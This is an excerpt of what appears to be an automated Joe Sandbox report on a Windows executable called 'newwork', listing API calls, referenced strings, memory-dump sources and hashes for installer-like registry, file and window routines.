                                                                                • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,00454B0D,?,?,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                Strings
                                                                                • RegOpenKeyEx, xrefs: 00454910
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                • , xrefs: 004548FE
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$FormatMessageOpen
                                                                                • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                • API String ID: 2812809588-1577016196
                                                                                • Opcode ID: aec1327b0b0803e0d56dc0c3992fac0afe6f111b5b563ab43accc1af076cf8f5
                                                                                • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                • Opcode Fuzzy Hash: aec1327b0b0803e0d56dc0c3992fac0afe6f111b5b563ab43accc1af076cf8f5
                                                                                • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                APIs
                                                                                  • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                Strings
                                                                                • .NET Framework not found, xrefs: 0045961D
                                                                                • v1.1.4322, xrefs: 004595C2
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                • v4.0.30319, xrefs: 004594F1
                                                                                • v2.0.50727, xrefs: 0045955B
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                • .NET Framework version %s not found, xrefs: 00459609
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Close$Open
                                                                                • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                • API String ID: 2976201327-446240816
                                                                                • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                Strings
                                                                                • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                • Helper process exited., xrefs: 00458AC5
                                                                                • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                • API String ID: 3355656108-1243109208
                                                                                • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                APIs
                                                                                  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                Strings
                                                                                • RegCreateKeyEx, xrefs: 004545C3
                                                                                • , xrefs: 004545B1
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFormatMessageQueryValue
                                                                                • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                • API String ID: 2481121983-1280779767
                                                                                • Opcode ID: f9c0919aa15cd1947ef757741bec092e2a41be70418b738709af356a648b502b
                                                                                • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                • Opcode Fuzzy Hash: f9c0919aa15cd1947ef757741bec092e2a41be70418b738709af356a648b502b
                                                                                • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                APIs
                                                                                  • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                  • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                  • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                • API String ID: 1549857992-2312673372
                                                                                • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                • API String ID: 4190037839-2312295185
                                                                                • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 004629FC
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                • API String ID: 2610873146-3407710046
                                                                                • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 0042F194
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                • API String ID: 2610873146-3407710046
                                                                                • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021A3858,00000000), ref: 00458C79
                                                                                • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                • String ID: CreateEvent$TransactNamedPipe
                                                                                • API String ID: 2182916169-3012584893
                                                                                • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85), ref: 00456D48
                                                                                • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                • API String ID: 1914119943-2711329623
                                                                                • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                APIs
                                                                                • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                • SaveDC.GDI32(?), ref: 00416E27
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                • DeleteObject.GDI32(?), ref: 00416F22
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
